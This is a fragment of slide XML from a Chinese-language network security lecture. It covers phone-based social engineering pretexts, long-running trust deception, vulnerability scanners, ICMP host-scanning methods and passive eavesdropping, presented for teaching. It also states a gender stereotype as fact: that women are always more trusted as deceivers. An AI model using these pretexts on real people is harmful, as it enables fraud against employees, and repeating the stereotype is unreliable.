            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>搜索引擎</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14551422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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一位新的职员寻求帮助，试图找到在计算机上完成某个特定任务的方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一位愤怒的经理打电话给下级，因为他的口令突然失效</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一位系统管理员打电话给一名职员，需要修补它的账号，而这需要使用它的口令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一位新雇佣的远程管理员打电话给公司，询问安全系统的配置资料</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一位客户打电话给供应商，询问公司的新计划，发展方向和公司主要负责人</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80900" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>社交工程攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>电话访问</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80898"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3AC00ADA-CE66-464A-B916-2065D79012FB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209491203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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当电话社交工程失败的时候，攻击者可能展开长达数月的信任欺骗</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>典型情况</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过熟人介绍，来一次四人晚餐</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以隐藏自己的身份，通过网络聊天或者是电子邮件与之结识</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪装成工程技术人员骗取别人回复信件，泄漏有价值的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一般说来，有魅力的异性通常是最可怕的信任欺骗者，不过不论对于男性还是女性，女性总是更容易令人信任</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81924" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>社交工程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信任欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81922"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BFE8B90B-351C-47DD-B93B-C33AE12C13EB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77378808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网络扫描器</a:t>
            </a:r>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72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动检测远程或本地系统安全性弱点（漏洞）的程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标：工作站、服务器、交换机、数据库应用等各种对象。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全评估工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统管理员保障系统安全的有效工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络漏洞扫描器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络入侵者收集信息的重要手段</a:t>
            </a:r>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523C96D-6DA9-461B-9F2C-A918FEAD4B6F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276482" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络扫描器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3900099390"/>
      </p:ext>
    </p:extLst>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描目标主机识别其工作状态（开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关机）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>识别目标主机端口的状态（监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关闭）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>识别目标主机系统及服务程序的类型和版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>根据已知漏洞信息，分析系统脆弱点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>生成扫描结果报告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280578" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络扫描器的主要功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{65623B0F-72DA-431B-8455-F749A3BF1958}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3068024283"/>
      </p:ext>
    </p:extLst>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扫描器的基本工作原理</a:t>
            </a:r>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pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>投石问路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 3" descr="ss copy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="2109559"/>
            <a:ext cx="5544616" cy="4343777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122717225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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机扫描技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口扫描技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303106" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络扫描的主要技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BFEA957B-286F-4DB3-A77A-94EBDF543A73}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3827519956"/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确定在目标网络上的主机是否可达</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常用的传统扫描手段有：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP Echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP Sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Broadcast ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Non-Echo ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305154" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机扫描技术－传统技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C8802DBC-8478-4680-B6D2-D7FC611D2A28}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2830158765"/>
      </p:ext>
    </p:extLst>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>ICMP echo——Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>优点：简单，系统支持</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>缺点：很容易被防火墙限制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>ICMP Sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>扫描：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可以通过并行发送，同时探测多个目标主机，以提高探测效率</a:t>
            </a:r>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3442031-7331-4481-BD9C-405DDE3F7FD2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307202" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="842737583"/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>非法（非授权）获取信息，但不对信息做任何修改。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常见手段：搭线监听、无线截（取）获、其他截获、消息内容分析、通信量（业务流）分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通信量分析：测定通信主机的位置和标识，观察被交换消息的频率和长度。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>特点：不易被发现。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>预防措施：重点在于预防 ，如加密、虚拟专用网（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292866" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被动攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>受害者难感知</a:t>
            </a:r>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FBC64B68-A349-484A-B1AE-51482B15072A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="834450372"/>
      </p:ext>
    </p:extLst>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP ECHO request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包目标地址设为广播地址或网络地址，可探测广播域或整个网络范围内的主机。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只适合于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UNIX/Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会忽略这种请求包；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这种扫描方式容易引起广播风暴</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309250" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Broadcast ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
